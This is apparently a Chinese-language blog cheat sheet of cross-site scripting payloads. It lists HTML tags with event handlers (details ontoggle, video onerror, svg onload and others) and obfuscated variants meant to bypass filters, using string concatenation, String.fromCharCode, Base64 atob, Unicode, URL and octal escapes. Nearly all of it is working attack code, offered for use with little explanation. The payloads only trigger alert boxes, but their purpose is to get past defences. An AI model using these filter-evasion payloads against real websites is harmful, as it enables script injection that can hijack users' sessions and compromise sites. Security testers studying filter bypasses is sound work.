可用语句有:
<video src=1 onerror=alert(/xss/)>绕过
<audio src=x onerror=alert(/xss/)>
<body/onfocus=alert(/xss/)>
<details open ontoggle=alert(/xss/)>
<button onfocus=alert(/xss/)autofocus>
<details open ontoggle=top.alert(1)> //注,在goole浏览器实用
<details open ontoggle=top[‘prompt’](1)>
<details open ontoggle=top[‘al’%2b’ert’](1)> %2b为url编码的+
%27"><details%20open%20ontoggle=eval(%27alert(1)%27)>
使用concat来拼接字符串javascript:alert(1)//不行
<iframe onload=location=’javascri’.concat(‘pt:aler’,’t(1)’)>
<script>alert(1)</script>Ascii编码
<body/onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62)) >
<svg/onload=setTimeout(String.fromCharCode(97,108,101,114,116,40,49,41))>
其他:
Base64编码:
<details open ontoggle=eval(atob(‘YWxlcnQoMSk=’)) >
eval拦截的话,可以试试,把 e Unicode编码
<details open ontoggle=\u0065val(atob(‘YWxlcnQoMSk=’)) >
url编码:
<details open ontoggle=%65%76%61%6c(atob(‘YWxlcnQoMSk=’)) >
url编码:
<details open ontoggle=eval(‘%61%6c%65%72%74%28%31%29’) >
JS8编码:
<details open ontoggle=eval(‘\141\154\145\162\164\50\61\51’) >
Ascii码绕过:
<details open ontoggle=eval(String.fromCharCode(97,108,101,114,116,40,49,41)) >
网友评论